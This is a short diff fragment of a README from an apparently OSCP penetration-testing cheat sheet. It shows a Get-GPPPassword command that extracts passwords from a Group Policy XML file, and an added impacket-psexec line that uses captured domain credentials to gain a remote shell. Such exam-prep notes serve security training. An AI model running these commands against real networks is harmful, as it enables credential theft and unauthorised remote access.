Kevinolinn8/OSCP-Cheatsheet/README.md

 # parse a local file
 Get-GPPPassword.py -xmlfile '/path/to/Policy.xml' 'LOCAL'

+#if we have access to smb client via username and password we can always try to upgrade to rev shell using impack-psexec
+impacket-psexec domainNAME/USER:'PASSWORD'@<IP>

 ```

 - SMB share - If SYSVOL share or any share which `domain` name as folder name